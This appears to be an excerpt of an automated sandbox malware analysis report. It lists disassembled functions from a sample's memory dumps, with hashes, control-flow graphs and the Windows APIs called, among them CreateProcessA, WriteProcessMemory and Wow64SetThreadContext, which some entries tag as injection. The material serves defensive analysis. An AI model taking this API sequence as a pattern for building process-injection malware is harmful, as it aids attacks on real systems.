                                                        • Instruction Fuzzy Hash: 7D4119B1F34105CBDB98AAB989516AFB6B7EBC9600F91C42AD601BB2C4CB309D418F51
                                                        Function 07188779 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T(z
                                                        • API String ID: 0-3184255237
                                                        • Opcode ID: 73b7330b83693cf575164c2afbf0df01458c851d08236be26786a4b084ec076d
                                                        • Instruction ID: c39092cb32d1fb20cf4a77defc6318f161680c3a8789bdfe2036c97a5627e1d2
                                                        • Opcode Fuzzy Hash: 73b7330b83693cf575164c2afbf0df01458c851d08236be26786a4b084ec076d
                                                        • Instruction Fuzzy Hash: C1310BB1F35105CBDBD8AAB489516BFB2B7EBC9600F91C42AD602BB2D4CB308D418F51
                                                        Function 071882B1 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T(z
                                                        • API String ID: 0-3184255237
                                                        • Opcode ID: 41950864921cc78164b894a151f2954bf972fe767b0efd14ca16272bf989fc77
                                                        • Instruction ID: 23a21e6dc67259c7a19523cc4a6da3f8f00bf57026212f589d0633f4adcfbad9
                                                        • Opcode Fuzzy Hash: 41950864921cc78164b894a151f2954bf972fe767b0efd14ca16272bf989fc77
                                                        • Instruction Fuzzy Hash: D7310BB1F35105CBDBD8AAB489516BFB2B7EBC9640F91C42AD602BB2D4CB308D418F51
                                                        Function 07180F89 Relevance: .3, Instructions: 278COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72bc1ca1e2ff86a59edc8c0da14602c3e16e03e493f9e9046a15580e45424852
                                                        • Instruction ID: 6dd63b2b93a340e017263a38c9252ef860a402332572b7459a6f41bad6f57ad8
                                                        • Opcode Fuzzy Hash: 72bc1ca1e2ff86a59edc8c0da14602c3e16e03e493f9e9046a15580e45424852
                                                        • Instruction Fuzzy Hash: 6AA124B21192DA9FC7899B34C8905A97FB2EF47320B66449FD4818F293D730D94ADF80
                                                        Function 02C23F50 Relevance: .3, Instructions: 277COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e65e9984968c31eb904cb559330c4da7a7fae1776ee45cfe7e4d6ab3145da52b
                                                        • Instruction ID: e4e6bde422f064a74a59cb92961d9bfa43aef14eb9fa2d01a79babb16228dbcd
                                                        • Opcode Fuzzy Hash: e65e9984968c31eb904cb559330c4da7a7fae1776ee45cfe7e4d6ab3145da52b
                                                        • Instruction Fuzzy Hash: 18C1E475D04228CFDB28CF66C945BE9BBB6BF89300F1091EAD40DA6251EB705AC9CF50
                                                        Function 07181060 Relevance: .2, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c77ec6c482406243311dda7ec829abe29f560891a396bd819ec139ead8d85f4c
                                                        • Instruction ID: 456eea60ae1997ab769ed5fe43f5e67f303d3bd1d9cceed1bf969844af35f41c
                                                        • Opcode Fuzzy Hash: c77ec6c482406243311dda7ec829abe29f560891a396bd819ec139ead8d85f4c
                                                        • Instruction Fuzzy Hash: B861C2B222425DDFC788DF28C9904297BB7BB86300BA3845AD816DF291D731ED46EF45
                                                        Function 07187F18 Relevance: .1, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c798bb320f5b89f9ed0bde85227fa4d6dbe0c2ec3d9f9f2471c1f9798fa3182e
                                                        • Instruction ID: 58759d2d9687cedc017ef18e8f2390c44ac808d0a23921995bf03d8f2f350059
                                                        • Opcode Fuzzy Hash: c798bb320f5b89f9ed0bde85227fa4d6dbe0c2ec3d9f9f2471c1f9798fa3182e
                                                        • Instruction Fuzzy Hash: 5E4193B1A14119DBC788AEE9C9418AEFBB6EF89210F314426F515EB2D0D73289418F81
                                                        Function 07187F28 Relevance: .1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47eb55141eed5edeb9489c822b31bcf27b2320409f636cadc80b712b9428027b
                                                        • Instruction ID: d805bcd62b3bbe7643315c4d34479c7c04477922cd910c196de4982e38894760
                                                        • Opcode Fuzzy Hash: 47eb55141eed5edeb9489c822b31bcf27b2320409f636cadc80b712b9428027b
                                                        • Instruction Fuzzy Hash: FC41B675A14119DBCB88EFE9C9418AEFBB6EF89210F714426F519EB2E0C7318D418F81
                                                        Function 012DD429 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 394 12dd429-12dd4c7 GetCurrentProcess 398 12dd4c9-12dd4cf 394->398 399 12dd4d0-12dd504 GetCurrentThread 394->399 398->399 400 12dd50d-12dd541 GetCurrentProcess 399->400 401 12dd506-12dd50c 399->401 403 12dd54a-12dd565 call 12dd608 400->403 404 12dd543-12dd549 400->404 401->400 407 12dd56b-12dd59a GetCurrentThreadId 403->407 404->403 408 12dd59c-12dd5a2 407->408 409 12dd5a3-12dd605 407->409 408->409
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 012DD4B6
                                                        • GetCurrentThread.KERNEL32 ref: 012DD4F3
                                                        • GetCurrentProcess.KERNEL32 ref: 012DD530
                                                        • GetCurrentThreadId.KERNEL32 ref: 012DD589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 1e17921c209ea456529c02550129a8844a67270a395b9db49821a0d38c592373
                                                        • Instruction ID: df080b804ba11cd7e03f3c8296f66efa61f6702b9d9d450dc8d782ebdce317ac
                                                        • Opcode Fuzzy Hash: 1e17921c209ea456529c02550129a8844a67270a395b9db49821a0d38c592373
                                                        • Instruction Fuzzy Hash: 7D5178B0910609CFDB18CFA9D948B9EBBF5FF88318F24C059E019A73A1D7746944CB65
                                                        Function 012DD438 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 416 12dd438-12dd4c7 GetCurrentProcess 420 12dd4c9-12dd4cf 416->420 421 12dd4d0-12dd504 GetCurrentThread 416->421 420->421 422 12dd50d-12dd541 GetCurrentProcess 421->422 423 12dd506-12dd50c 421->423 425 12dd54a-12dd565 call 12dd608 422->425 426 12dd543-12dd549 422->426 423->422 429 12dd56b-12dd59a GetCurrentThreadId 425->429 426->425 430 12dd59c-12dd5a2 429->430 431 12dd5a3-12dd605 429->431 430->431
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 012DD4B6
                                                        • GetCurrentThread.KERNEL32 ref: 012DD4F3
                                                        • GetCurrentProcess.KERNEL32 ref: 012DD530
                                                        • GetCurrentThreadId.KERNEL32 ref: 012DD589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 4b54381bc240afbbc3aae02e2fc826d068c4600a1ad0ed5eb6324fddb2604b1c
                                                        • Instruction ID: 9ae8c206ee10a4cd86ae52619f879a643ce47c7b1587248592bb5f3b393795a9
                                                        • Opcode Fuzzy Hash: 4b54381bc240afbbc3aae02e2fc826d068c4600a1ad0ed5eb6324fddb2604b1c
                                                        • Instruction Fuzzy Hash: 185177B0910609CFDB18CFA9D948B9EBBF5FF88318F20C059E019A73A0D7746944CB65
                                                        Function 0718B378 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 559 718b378-718b39b 560 718b39d 559->560 561 718b3a2-718b587 call 718b320 559->561 560->561 574 718b3ea-718b3ef 561->574 575 718b53b 561->575 576 718b3f1-718b3f2 574->576 577 718b3f4-718b3fc call 718bb30 574->577 578 718b541-718b545 575->578 576->577 579 718b402-718b43f 577->579 580 718b4e5-718b4e9 578->580 579->580 582 718b4eb-718b4ec call 718c1f0 580->582 583 718b4f1-718b56c 580->583 594 718b4da-718b4e4 582->594 583->578
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tefq$Tefq
                                                        • API String ID: 0-1395890369
                                                        • Opcode ID: 7ebe19d5cdf267b7d55d07254a64ec215b12ae00f6dd8d1c8983240a93d37c75
                                                        • Instruction ID: ef99247222b2783bc3bfee38e549603517f34d95866b3e562c3d119f519e4cd2
                                                        • Opcode Fuzzy Hash: 7ebe19d5cdf267b7d55d07254a64ec215b12ae00f6dd8d1c8983240a93d37c75
                                                        • Instruction Fuzzy Hash: 0961F9B4E18219CFDB58DFA9C884AEDBBB6FF89300F149029D419AB355DB305905CF50
                                                        Function 07183F41 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 660 7183f41-7183f49 662 7183f4c 660->662 663 7183f51-7183f66 662->663 664 7183f6c 663->664 665 7184130-7184137 663->665 664->662 664->665 666 718409b-7184111 664->666 667 7183f7c-7183fcd 664->667 668 7184062-7184065 664->668 709 7184113 call 7188c78 666->709 710 7184113 call 7188c61 666->710 682 7183fcf-7183fd5 667->682 683 7183fe5-7184037 667->683 715 7184068 call 7186438 668->715 716 7184068 call 7186448 668->716 671 718406e-7184075 700 718407a call 7187f18 671->700 701 718407a call 7187f28 671->701 702 718407a call 71880d8 671->702 703 718407a call 7188169 671->703 704 718407a call 718726c 671->704 705 718407a call 718728c 671->705 706 718407a call 71872ac 671->706 707 718407a call 7188120 671->707 708 718407a call 7187260 671->708 674 7184080 711 7184082 call 7188788 674->711 712 7184082 call 7188779 674->712 713 7184082 call 718877b 674->713 714 7184082 call 71882b1 674->714 675 7184088-7184096 675->663 684 7183fd9-7183fdb 682->684 685 7183fd7 682->685 696 7184039-718403f 683->696 697 718404f-718405d 683->697 684->683 685->683 692 7184119 694 7184120-718412b 692->694 694->663 698 7184041 696->698 699 7184043-7184045 696->699 697->663 698->697 699->697 700->674 701->674 702->674 703->674 704->674 705->674 706->674 707->674 708->674 709->692 710->692 711->675 712->675 713->675 714->675 715->671 716->671
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $fq$$fq
                                                        • API String ID: 0-2537786760
                                                        • Opcode ID: f7e49058af1c279f0bc83f577aca21173dd8fa7248f3c1e2721ae336e2f57191
                                                        • Instruction ID: 62c4c76e50493f4f1a9c8a4dd321f3cbc431c2ea5f5e01f75bc9675dc7ed697a
                                                        • Opcode Fuzzy Hash: f7e49058af1c279f0bc83f577aca21173dd8fa7248f3c1e2721ae336e2f57191
                                                        • Instruction Fuzzy Hash: 9E517F74B102049FDB489FB5D995BAE7AB3BB88700F248429F9069B3E4DE35DC018B51
                                                        Function 07183F7B Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 717 7183f7b 718 7183f7c-7183fcd 717->718 724 7183fcf-7183fd5 718->724 725 7183fe5-7184037 718->725 726 7183fd9-7183fdb 724->726 727 7183fd7 724->727 733 7184039-718403f 725->733 734 718404f-718405d 725->734 726->725 727->725 735 7184041 733->735 736 7184043-7184045 733->736 737 7183f51-7183f66 734->737 735->734 736->734 738 7183f6c 737->738 739 7184130-7184137 737->739 738->718 738->739 740 718409b-7184111 738->740 741 7183f4c 738->741 742 7184062-7184065 738->742 765 7184113 call 7188c78 740->765 766 7184113 call 7188c61 740->766 741->737 771 7184068 call 7186438 742->771 772 7184068 call 7186448 742->772 744 718406e-7184075 756 718407a call 7187f18 744->756 757 718407a call 7187f28 744->757 758 718407a call 71880d8 744->758 759 718407a call 7188169 744->759 760 718407a call 718726c 744->760 761 718407a call 718728c 744->761 762 718407a call 71872ac 744->762 763 718407a call 7188120 744->763 764 718407a call 7187260 744->764 746 7184080 767 7184082 call 7188788 746->767 768 7184082 call 7188779 746->768 769 7184082 call 718877b 746->769 770 7184082 call 71882b1 746->770 747 7184088-7184096 747->737 754 7184119 755 7184120-718412b 754->755 755->737 756->746 757->746 758->746 759->746 760->746 761->746 762->746 763->746 764->746 765->754 766->754 767->747 768->747 769->747 770->747 771->744 772->744
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $fq$$fq
                                                        • API String ID: 0-2537786760
                                                        • Opcode ID: e0668c1db537a62c11917f69e9e085fbb57dc1b9829092f04f5025de9dd8d3d0
                                                        • Instruction ID: 8cba606a0b97e9a34602fc460d00e51e6c699c5faed76490c0c85c5bb67afd9c
                                                        • Opcode Fuzzy Hash: e0668c1db537a62c11917f69e9e085fbb57dc1b9829092f04f5025de9dd8d3d0
                                                        • Instruction Fuzzy Hash: 1C418F74B102049FDB489FB5C995BAE7AB3BB88700F248469F9069B3D4CE35DC018B51
                                                        Function 02C222BC Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 773 2c222bc-2c222c5 774 2c22287-2c222b0 773->774 775 2c222c7-2c2235d 773->775 778 2c22396-2c223b6 775->778 779 2c2235f-2c22369 775->779 786 2c223b8-2c223c2 778->786 787 2c223ef-2c2241e 778->787 779->778 781 2c2236b-2c2236d 779->781 784 2c22390-2c22393 781->784 785 2c2236f-2c22379 781->785 784->778 788 2c2237b 785->788 789 2c2237d-2c2238c 785->789 786->787 790 2c223c4-2c223c6 786->790 799 2c22420-2c2242a 787->799 800 2c22457-2c22511 CreateProcessA 787->800 788->789 789->789 792 2c2238e 789->792 793 2c223c8-2c223d2 790->793 794 2c223e9-2c223ec 790->794 792->784 796 2c223d6-2c223e5 793->796 797 2c223d4 793->797 794->787 796->796 801 2c223e7 796->801 797->796 799->800 802 2c2242c-2c2242e 799->802 811 2c22513-2c22519 800->811 812 2c2251a-2c225a0 800->812 801->794 804 2c22430-2c2243a 802->804 805 2c22451-2c22454 802->805 806 2c2243e-2c2244d 804->806 807 2c2243c 804->807 805->800 806->806 808 2c2244f 806->808 807->806 808->805 811->812 822 2c225a2-2c225a6 812->822 823 2c225b0-2c225b4 812->823 822->823 826 2c225a8 822->826 824 2c225b6-2c225ba 823->824 825 2c225c4-2c225c8 823->825 824->825 827 2c225bc 824->827 828 2c225ca-2c225ce 825->828 829 2c225d8-2c225dc 825->829 826->823 827->825 828->829 830 2c225d0 828->830 831 2c225ee-2c225f5 829->831 832 2c225de-2c225e4 829->832 830->829 833 2c225f7-2c22606 831->833 834 2c2260c 831->834 832->831 833->834 835 2c2260d 834->835 835->835
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02C224FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 40715efe4e8bc4b05e8246d7835a48dd798c484a86c5eaa4d3e332c9de88c09b
                                                        • Instruction ID: 6b96bd32b6cffe98e1f365358bcc20c0639c8908f29428d5a49da27705afaa4d
                                                        • Opcode Fuzzy Hash: 40715efe4e8bc4b05e8246d7835a48dd798c484a86c5eaa4d3e332c9de88c09b
                                                        • Instruction Fuzzy Hash: 20A18E71D00229CFDB24CF68C951BEDBBB6FF88314F148169D809A7240DB749A89CF92
                                                        Function 02C222C8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 837 2c222c8-2c2235d 839 2c22396-2c223b6 837->839 840 2c2235f-2c22369 837->840 845 2c223b8-2c223c2 839->845 846 2c223ef-2c2241e 839->846 840->839 841 2c2236b-2c2236d 840->841 843 2c22390-2c22393 841->843 844 2c2236f-2c22379 841->844 843->839 847 2c2237b 844->847 848 2c2237d-2c2238c 844->848 845->846 849 2c223c4-2c223c6 845->849 856 2c22420-2c2242a 846->856 857 2c22457-2c22511 CreateProcessA 846->857 847->848 848->848 850 2c2238e 848->850 851 2c223c8-2c223d2 849->851 852 2c223e9-2c223ec 849->852 850->843 854 2c223d6-2c223e5 851->854 855 2c223d4 851->855 852->846 854->854 858 2c223e7 854->858 855->854 856->857 859 2c2242c-2c2242e 856->859 868 2c22513-2c22519 857->868 869 2c2251a-2c225a0 857->869 858->852 861 2c22430-2c2243a 859->861 862 2c22451-2c22454 859->862 863 2c2243e-2c2244d 861->863 864 2c2243c 861->864 862->857 863->863 865 2c2244f 863->865 864->863 865->862 868->869 879 2c225a2-2c225a6 869->879 880 2c225b0-2c225b4 869->880 879->880 883 2c225a8 879->883 881 2c225b6-2c225ba 880->881 882 2c225c4-2c225c8 880->882 881->882 884 2c225bc 881->884 885 2c225ca-2c225ce 882->885 886 2c225d8-2c225dc 882->886 883->880 884->882 885->886 887 2c225d0 885->887 888 2c225ee-2c225f5 886->888 889 2c225de-2c225e4 886->889 887->886 890 2c225f7-2c22606 888->890 891 2c2260c 888->891 889->888 890->891 892 2c2260d 891->892 892->892
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02C224FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 0e3c4996dbf32200099db9280958f182adbdab4c7f0995e9720361ab87b29b44
                                                        • Instruction ID: a5340c8bc9405c212b70b3f05b5ddfc321cd59aefeec34db720fe13f9b49d3b3
                                                        • Opcode Fuzzy Hash: 0e3c4996dbf32200099db9280958f182adbdab4c7f0995e9720361ab87b29b44
                                                        • Instruction Fuzzy Hash: 9D915C71D00229DFDF24CF68C951BEDBBB6BF48314F148169E809A7290DB749A85CF92
                                                        Function 012DADA8 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 894 12dada8-12dadb7 895 12dadb9-12dadc6 call 12da100 894->895 896 12dade3-12dade7 894->896 903 12daddc 895->903 904 12dadc8 895->904 897 12dade9-12dadf3 896->897 898 12dadfb-12dae3c 896->898 897->898 905 12dae3e-12dae46 898->905 906 12dae49-12dae57 898->906 903->896 953 12dadce call 12db031 904->953 954 12dadce call 12db040 904->954 905->906 907 12dae59-12dae5e 906->907 908 12dae7b-12dae7d 906->908 912 12dae69 907->912 913 12dae60-12dae67 call 12da10c 907->913 911 12dae80-12dae87 908->911 909 12dadd4-12dadd6 909->903 910 12daf18-12daf2f 909->910 927 12daf31-12daf90 910->927 915 12dae89-12dae91 911->915 916 12dae94-12dae9b 911->916 914 12dae6b-12dae79 912->914 913->914 914->911 915->916 918 12dae9d-12daea5 916->918 919 12daea8-12daeaa call 12da11c 916->919 918->919 923 12daeaf-12daeb1 919->923 925 12daebe-12daec3 923->925 926 12daeb3-12daebb 923->926 928 12daec5-12daecc 925->928 929 12daee1-12daeee 925->929 926->925 945 12daf92-12daf94 927->945 928->929 930 12daece-12daede call 12da12c call 12da13c 928->930 934 12daf11-12daf17 929->934 935 12daef0-12daf0e 929->935 930->929 935->934 946 12daf96-12dafbe 945->946 947 12dafc0-12dafd8 945->947 946->947 948 12dafda-12dafdd 947->948 949 12dafe0-12db00b GetModuleHandleW 947->949 948->949 950 12db00d-12db013 949->950 951 12db014-12db028 949->951 950->951 953->909 954->909
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 012DAFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: cba5da1481ab77632a58b42d60f996e38ce42e7ad4db11f708831ed8f0bf8267
                                                        • Instruction ID: d9ae3ff286a2a29238bb36202e1fcff9567298dd7c6bf61b73437f020b5dbf34
                                                        • Opcode Fuzzy Hash: cba5da1481ab77632a58b42d60f996e38ce42e7ad4db11f708831ed8f0bf8267
                                                        • Instruction Fuzzy Hash: E78168B0A10B068FDB24DF29D441BAABBF1FF88304F00892ED58AD7A51D775E945CB91
                                                        Function 012D590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 955 12d590c-12d5916 956 12d5918-12d59d9 CreateActCtxA 955->956 958 12d59db-12d59e1 956->958 959 12d59e2-12d5a3c 956->959 958->959 966 12d5a3e-12d5a41 959->966 967 12d5a4b-12d5a4f 959->967 966->967 968 12d5a51-12d5a5d 967->968 969 12d5a60 967->969 968->969 971 12d5a61 969->971 971->971
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 012D59C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: c2f6f054024f11ad7bdd4d69c1668c729d79eed8729af5946b412764052d9312
                                                        • Instruction ID: 7e04707da6bf8c2ad50c98d43f05951e94a6d09ab1908ff8079ed7cf703674a1
                                                        • Opcode Fuzzy Hash: c2f6f054024f11ad7bdd4d69c1668c729d79eed8729af5946b412764052d9312
                                                        • Instruction Fuzzy Hash: 5F41D0B1C10719CFDB24CFA9C984B9EBBF5BF49304F20806AD448AB251DBB56946CF91
                                                        Function 012D44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 012D59C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: a37f879ef98f854ed41c04ad86e0b2a182061bb64ae202c188761390e027464e
                                                        • Instruction ID: fba838c60b2f603f884b2ff9bc61ac0994a8d0e88de5fbb76dbc3340fa9ef330
                                                        • Opcode Fuzzy Hash: a37f879ef98f854ed41c04ad86e0b2a182061bb64ae202c188761390e027464e
                                                        • Instruction Fuzzy Hash: 2141D1B0C10719CFDB24CFA9C985B9EBBB5BF89304F20806AD408AB251DBB56945CF91
                                                        Function 02C22038 Relevance: 1.6, APIs: 1, Instructions: 88injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02C220D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 17829dce04fbf57b6ea21ec4dc3d9b23c3c0033ef638f0f450ffb633fd9a4177
                                                        • Instruction ID: 86b6380d1c1f23cade73e51dcca8efffcc7aaed950f865bb42f51b56e9ce0729
                                                        • Opcode Fuzzy Hash: 17829dce04fbf57b6ea21ec4dc3d9b23c3c0033ef638f0f450ffb633fd9a4177
                                                        • Instruction Fuzzy Hash: 073169B6D002098FCB10CFA9C8817DEBBF1FF88320F14842AE959A7255CB799945DB91
                                                        Function 02C21630 Relevance: 1.6, APIs: 1, Instructions: 84threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02C216B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: ab126ec8f4df530cc766b8a1d799467cc37bfdd3e42afdffc7d2c15f124b7d88
                                                        • Instruction ID: d2be2acde11993aad0868f8dd2d65d4cbd2b5ab8ff85af13365cf3f0ad22b4a7
                                                        • Opcode Fuzzy Hash: ab126ec8f4df530cc766b8a1d799467cc37bfdd3e42afdffc7d2c15f124b7d88
                                                        • Instruction Fuzzy Hash: 22317CB1D002098FDB10DFA9C4857EEFBF5EF88324F28842AD459A7241CB799945CF90
                                                        Function 02C22128 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02C221B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
